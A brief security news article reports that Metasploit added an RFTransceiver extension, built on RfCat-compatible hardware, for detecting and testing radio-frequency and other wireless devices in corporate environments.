Targeting Internet of Things: Metasploit Tool Adds Wireless Device Detection

Metasploit has added a feature to support scanning for wireless devices.

In-brief: The Metasploit Framework has a new extension to test for wireless devices that communicate over radio frequency (RF), Bluetooth and other protocols. 

In a nod to the growing presence of Internet of Things devices, Metasploit, everyone’s favorite penetration testing tool, has added support for an extension that will detect radio frequency (RF) devices, the company said on Tuesday.

The extension, dubbed RFTransceiver, allows Metasploit users to couple software defined radios, RF transmitters and other equipment to the Metasploit framework, allowing security pros to generate and monitor radio frequency traffic that can identify wireless systems deployed in a corporate environment.

Devices communicating on frequencies other than the 802.11 wireless networking standard are becoming more and more common in homes and workplaces. The recent Mirai botnet attack has raised awareness of the security risk posed by low value, unobtrusive connected devices such as wi-fi cameras.

Wireless devices that might lurk in corporate environments run the gamut from consumer accessories like wireless garage door openers and vehicle key fobs to RFID door card readers, wireless security systems, Zigbee controlled lights, and HVAC systems, notes Craig Smith, the head of Transportation Research at Rapid7, which owns Metasploit. However companies have limited options for monitoring such devices.

The RFTransceiver is designed to address that problem: allowing wireless testing and hacking tools by companies like Hak5. Initially, RFTransceiver will support the TI cc11xx Low-Power Sub-1GHz RF Transceiver and there’s an API that is compatible with the popular RfCat python framework for the TI cc11xx chipsets. Testers would also need an RfCat compatible testing device, like Yard Stick One, Smith said.  Out of the box there are two Metasploit modules: an Amplitude Modulation based brute  tool (rfpwnon) and a generic transmitter (transmitter), the company said. Presumably, more modules will be added as community members embrace the new wireless testing capabilities of the Framework.

Canvassing and testing of wireless devices that communicate via Bluetooth, RF and other wireless protocols has been the province of specialized pentesting firms. More recently, startups such as Bastille Networks and Pwnie Express have come to market with a range of enterprise focused wireless testing software that allows companies to identify rogue wireless devices in their networks.

Spread the word!

Comments are closed.